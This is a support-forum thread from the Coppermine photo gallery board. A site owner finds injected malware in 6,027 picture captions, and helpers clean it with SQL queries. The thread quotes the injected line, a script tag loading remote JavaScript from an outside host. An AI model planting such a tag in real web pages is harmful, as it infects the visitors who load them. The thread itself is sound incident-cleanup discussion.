[Solved]: Avast warning about HTML:Script-inf [Solved]: Avast warning about HTML:Script-inf
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

[Solved]: Avast warning about HTML:Script-inf

Started by redbjork, March 27, 2009, 12:43:01 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

redbjork

Hello and thank you for a great product.

A couple of days ago I was struck with malware on my coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new

So I thought I had cleaned the site using winmerge and the guide plus upgrading to latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with a malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. Only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded avast and updated to latest version. And found some evil code

(attached file)
This is the interesting part
<!-- BEGIN caption -->
                                <tr>
                                        <td class="tableb"><center>
                                                <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
                                        </center></td>
                                </tr>
<!-- END caption -->

Problem is that I can not find this code on my site (searched every file on site for this text without luck). This is generated some how from what I do not know.

Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0

Any assistance would be appreciated.

Nibbler

That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.

redbjork

Thank you so much  ;D
I opened my phpmyadmin and did a search on the adress
I found the following
6027 match(es) inside table cpg149_pictures

Now I have a couple of questions.
1.   How do I clean this? Im no expert in myphpadmin, but I guess that I could individually remove each line of code 6027 times. Im guessing there is a faster way.
2.   Do any one know how this happen. Yes this is lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of coppermine, but now it´s upgraded.
3.   How do I stop this from happening again? Any tip would be welcome.

I have included two files to assist you in your anwsers.
The exported cpg149_pictures database and myphpinfo from coppermine.

And thank you again.

Nibbler

Run this query in phpmyadmin to clean the captions:


UPDATE cpg149_pictures SET caption = ''

redbjork

If ill run
UPDATE cpg149_pictures SET caption = ''
Don´t that remove all the comments also? I  just want to remove the bad code.

Thank you for the help again.

redbjork

Asked a friend that knows msql
He gave me this code to run

UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'

That worked like a charm   :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.

So now to question 2 and 3? Any ideas?

I just want everything to be up to specs. And for all other people that will or has the same problem.

Thank you for all your help, im impressed by the speed I recived help.

Joachim Müller

The fields "caption" and comments posted on a file (residing in another table) are different animals.

redbjork

Ah ok, well I was unshure, so I guess both of the queries would have worked then. ::)